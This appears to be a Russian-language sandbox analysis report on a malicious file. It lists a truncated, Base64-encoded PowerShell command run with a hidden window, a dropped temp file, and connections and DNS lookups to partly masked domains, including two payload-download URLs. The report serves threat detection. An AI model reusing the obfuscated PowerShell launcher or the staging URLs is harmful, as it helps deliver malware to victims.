Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG0ANABqAHEAZAB0AD0AKAAnAFkAYwBoAF8AeAAnACsAJwBnAG4AJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBuAHYAOgBUAGUAbQBQAFwATwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1496
- %TEMP%\760785.cvr
- 'ru##inc.com':80
- 'ru##inc.com':443
- 'ag####ilderness.com':80
- 'ny###ealing.com':443
- http://ru##inc.com/7k2ql/zmIt/
- http://ag####ilderness.com/wordpress/cj5O/
- 'ru##inc.com':443
- 'ny###ealing.com':443
- DNS ASK ru##inc.com
- DNS ASK ag####ilderness.com
- DNS ASK ja####elescope.com
- DNS ASK ny###ealing.com
- DNS ASK 5a##.com
- DNS ASK co#####-cozy-deals.com
- DNS ASK ge###dels.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAG0ANABqAHEAZAB0AD0AKAAnAFkAYwBoAF8AeAAnACsAJwBnAG4AJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQAZQBuAHYAOgBUAGUAbQBQAFwATwBGAEYASQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH... (со скрытым окном)